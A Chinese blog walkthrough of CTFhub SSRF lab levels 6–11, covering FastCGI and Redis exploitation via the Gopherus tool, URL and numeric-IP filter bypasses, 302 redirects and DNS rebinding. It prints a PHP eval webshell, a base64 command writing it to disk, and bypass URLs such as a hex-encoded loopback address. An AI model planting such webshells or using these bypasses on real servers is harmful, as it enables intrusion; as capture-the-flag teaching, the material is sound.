CTFhub通关攻略-SRRF篇【6-11关】

于 2024-08-28 17:23:15 发布
阅读量930 收藏 11
点赞数 32
分类专栏: CTFfub通关攻略 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_65852138/article/details/141635820
版权

06 FastCGI协议

漏洞原理

https://blog.csdn.net/mysteryflower/article/details/94386461

该关需要将一句话木马写入题目网站下,一句话木马要进行base64编码确实用双引号才可以。

一句话木马

<?php @eval($_POST[cmd]);?>

base64编码

PD9waHAgQGV2YWwoJF9QT1NUW2NtZF0pOz8+

 打开kali,在Gopherus中打开终端

Gopherus---网盘自取

链接: https://pan.baidu.com/s/1xQjNOpsgpjFuMVOT1eIutg 提取码: zxin

 使用Python运行gopherus,带参数

python2 gopherus.py --exploit fastcgi

之后让填写一个php文件的目录,而题目网站中就有一个index.php

所以将此文件的网址给他就可以

/var/www/html/index.php

 下一步,让给它一个命令,这里,我们就要讲一句话木马写入到一个php文件中

echo "PD9waHAgQGV2YWwoJF9QT1NUW2NtZF0pOz8+" | base64 -d > 2.php

 回车后得到一串payload,将这串payload进行URL编码

直接给到题目链接,这样我们的木马就写入到了题目链接中

 接下来进行远程操控,这里使用的工具是菜刀

填写木马的网址和密码,将编码方式改为UTF-8就可以了

进入到网站根目录中,找到Flag文件里面就是目标Flag

07 Redis协议

这一关和上一关的fastcgi是一样的,只是服务变为了Redis

使用gopherus工具后,会先问你你想要ReverseShell还是PHPShell,这里选择后者

之后也是需要填一下目录,但是不用填文件名

下一步写一句话木马,不用base64编码

在之后得到一串payload

接下来的步骤和上一关一样,这里就不在赘述

08 URL BYpass

这一关是我们填写的URL必须包含他给的这一串网址 http://notfound.ctfhub.com

这里使用@符号进行书写,在@符号和http://的中间加的东西不影响网址的作用,所以构造payload

如下图所示


09 数字IP BYpass

这一关输入常规的的http://127.0.0.1/flag.php发现过滤了127、172还有@

所以这里将127改为十六进制,就是0x7f(0x是十六进制前缀)

测试发现网站把 . 也过滤了,那我们用0将 . 代替

就得到的最终的payload

http://0x7f000001/flag.php

这样就得了目标payload

10 302跳转 BYpass

这一关再输入常规的payload后提示我们这个IP坏的

就是不让我们使用这个IP

那我们就是用域名将IP替换

127.0.0.1的域名就是localhost

这样就得到了目标Flag

11 DNS重绑定 BYpass

这一关是需要DNS重绑定,具体概念可以参考下面链接

DNS重绑定介绍

接下来我们需要点进题目的附件中,会跳转到知乎的网站上,里面有一个链接,如下图

进入到网址之后,我们将127.0.0.1和127.0.0.2分别填入,在下面框中得到两个IP的十六进制的URL,将这个URL替换题目网站的127.0.0.1,就可以得到目标Flag

Zhong-Xin
关注
  • 32
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTFHUB-技能树-WEB通关
Alita_lxz的博客
11-11 7034
Web 题目来自ctfhub技能树web部分 Web前置技能 操作系统 数据库 HTTP协议 请求方式 HTTP 请求方法, HTTP/1.1协议中共定义了八种方法(也叫动作)来以不同方式操作指定的资源。 ​ 1.OPTIONS   返回服务器针对特定资源所支持的HTTP请求方法。也可以利用向Web服务器发送’*'的请求来测试服务器的功能性,如获取当前URL所支持的方法。若请求成功,则它会在HTTP头中包含一个名为“Allow”的头,值是所支持的方法,如“GET,POST”。  2.HEAD   向服务
CTFHUB-WEB前置技能-HTTP协议-请求方式
K_ShenH的博客
06-08 2094
CTFHUB-WEB前置技能-HTTP协议-请求方式
CTFhub通关攻略-SSRF【1-5
最新发布
qq_65852138的博客
08-27 242
CTFhub通关攻略SRRF
CTFHub-Web-RCE-命令注入
qq_54037445的博客
11-29 2200
1、常见的拼接符1、A;B 先执行A,再执行B2、A & B 简单的拼接3、A | B 显示B的执行结果4、A&&B A执行成功之后才会执行B5、A || B A执行失败之后才会执行B, 在特殊情况下可代替空格2、常见的命令1.type 显示文本文件内容type x:\1.txt //显示x盘下的1.txt文件内容。
ctfhub-web-SSRF通关攻略
2401_82451607的博客
08-27 1047
ctfhub-web-SSRF通关攻略
CTFHUB-SSRF-端口扫描
weixin_68416970的博客
06-21 675
CTFHUB靶场技能树-SSRF-端口扫描的通关教程
CTFHub技能树--SSRF攻略
qq_68186313的博客
07-24 959
CTFHub技能树--SSRF攻略
愤怒的小鸟水煮蛋1-6通关录像.mp4
05-04
愤怒的小鸟水煮蛋1-6通关录像
愤怒的小鸟水煮蛋1-15通关录像.mp4
05-13
愤怒的小鸟水煮蛋1-15通关录像
愤怒的小鸟水煮蛋1-13通关录像.mp4
05-11
愤怒的小鸟水煮蛋1-13通关录像
证券行业加密业务安全风险监测与防御技术研究
qq_61863348的博客
08-27 622
摘要:解决证券⾏业加密流量威胁问题、加密流量中的应⽤⻛险问题,对若⼲证券⾏业的实际流量内容进⾏调研分析, 分析了证券⾏业加密流量⾯临的合规性⻛险和加密协议及证书本⾝存在的⻛险、以及可能存在的外部加密流量威 胁,并提出防御策略和措施。键字:证券加密业务、加密应用、加密流量、商用密码安全评估、加密风险、加密威胁、监测防御数据爆发式增长的DT(Data technology)时代,加密技术是数据传输的重要保护手段。随着互联网和企业内部流量场景的加密化趋势快速增长,证券行业也面临着更加迫切的加密需求。证券行业涉及
【第79课】服务攻防-中间件安全&IIS&Apache&Tomcat&Nginx&弱口令&错误配置&CVE
Lucker_YYY的博客
08-24 1071
免责声明本文发布的工具和脚本,仅用作测试和学习研究,禁止用于商业用途,不能保证其合法性,准确性,完整性和有效性,请根据情况自行判断。如果任何单位或个人认为该项目的脚本可能涉嫌侵犯其权利,则应及时通知并提供身份证明,所有权证明,我们将在收到认证文件后删除相内容。文中所涉及的技术、思路及工具等相知识仅供安全为目的的学习使用,任何人不得将其应用于非法用途及盈利等目的,间接使用文章中的任何工具、思路及技术,我方对于由此引起的法律后果概不负责。知识点1、中间件-IIS-短文件&解析&&写权限。
第134天:内网安全-横向移动&NTLM-Relay重放&Responder中继攻击&Ldap&Ews
weixin_71529930的博客
08-22 868
本节案例适用于不能获得域控密码和hash的情况。
ChaCha20:高效且安全的流密码算法
jiamisoft的博客
08-23 554
ChaCha20作为一种现代流密码算法,以其高速性能和良好的安全性,在信息安全领域占据了一席之地。随着技术的发展,ChaCha20将继续在保护数据安全方面发挥重要作用。同时,随着量子计算技术的进步,我们也需要注ChaCha20等现有加密算法在量子时代的安全性,并积极探索新的加密技术。
EV代码签名证书——消除软件下载时的安全警告
joySSL_的博客
08-27 640
开发公司和软件开发人员在发布应用程序后,当用户尝试下载并安装应用程序时,被SmartScreen识别为不常见或尚未建立起良好的信誉度,系统就会发出警告,提示用户该应用程序可能对电脑构成风险。最后在选择代码签名证书时一定要选择受信任的CA颁发的证书,否则部署完成之后无法被Windows识别还是一样会提示安全风险,可以先向JoySSL提交代码签名证书需求,如果不知道如何选择代码签名证书,也会有工作人员协助建议。:CA机构会发出代码签名证书Ukey,在收到证书后,你需要在相应的开发环境中安装证书。
【网络】HTTPS——HTTP的安全版本
2301_80224556的博客
08-21 1797
加密和解密首先需要简单了解一下 加密与解密 的概念加密:把明文经过一系列变换,形成密文解密:把密文经过一系列变换,还原成明文明文就是我们能看懂的信息,密文就是我们看不懂的东西。比如这博客现在就是以明文的形式显示的,但如果我将其变为火星文,所有人都看不懂,那它就变成密文了在加密与解密的过程中需要一个或者多个辅助数据,我们将其称为「密钥」加密是上锁,解密就是开锁,无论是上锁还是解锁,都需要钥匙,也就是「密钥」
Day98:云上攻防-云原生&K8s安全&Config泄漏&Etcd存储&Dashboard鉴权&Proxy暴露
m0_74402888的博客
08-24 1720
实战中不会常见,利用条件比较苛刻。默认通过证书认证,起一个数据库作用。主要存放节点的数据,如一些token和证书。攻击23791端口配置映射:第二种:在打开证书校验选项后,通过本地127.0.0.1:2379可免认证访问Etcd服务,但通过其他地址访问要携带cert(证书)进行认证访问,一般配合ssrf或其他利用,较为鸡肋。只能本地访问,直接未授权访问获取secrets和token利用。
利用Nginx反向代理优化Web应用的性能与安全
陆业聪
08-24 1216
本文探讨了Nginx作为Web服务器和反向代理的功能,重点在于性能优化、安全增强和负载均衡。内容涉及负载均衡技术、静态资源缓存、HTTP/2支持、HTTPS配置及防DDoS策略。文章强调了Nginx在现代Web架构中的键作用。
Metasploit漏洞利用系列(十):MSF渗透测试 - 震网三代(远程快捷方式漏洞)实战
2402_86373248的博客
08-24 646
在本系列的第十中,我们将深入探讨如何利用Metasploit Framework (MSF) 来利用著名的震网三代(Stuxnet三代)中的一个远程快捷方式漏洞(LNK漏洞)。虽然“震网三代”并非官方术语,而是为了描述一个类似震网蠕虫的高级威胁,但我们将以此为背景,探索利用Windows快捷方式(LNK)文件的漏洞进行渗透测试的技术细节。漏洞描述:想象一个虚构的场景,其中存在一个类似于CVE-2017-8464的LNK漏洞,允许攻击者通过恶意快捷方式文件在受害者计算机上执行任意代码,无需用户交互。
upload-labs 第四通关攻略
11-29
为了避免违反规则3,我无法提供upload-labs第四的具体攻略。但是,我可以给你一些提示和指导,帮助你完成这个挑战。 upload-labs是一个专门用于漏洞练习的平台,第四主要是于文件上传漏洞的。在这个挑战中,你需要上传一个png文件,并在其中插入一句话木马。具体步骤如下: 1. 打开上传页面,上传一个png文件。 2. 修改png文件的内容,在开头加入文件幻数检测绕过的png的value值:89 50 4E 47 0D 0A 1A 0A 00。 3. 在png文件的末尾添加一句话木马。你可以使用一些常见的一句话木马,例如:<?php eval($_POST['cmd']); ?> 4. 保存修改后的png文件,并重新上传到服务器。 5. 访问上传的png文件,触发一句话木马。 请注意,这只是一个大致的指导,具体的实现可能会因为upload-labs平台的更新而有所不同。在实际操作中,你需要仔细阅读题目要求和提示,结合自己的知识和经验,不断尝试和调试,才能成功完成这个挑战。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值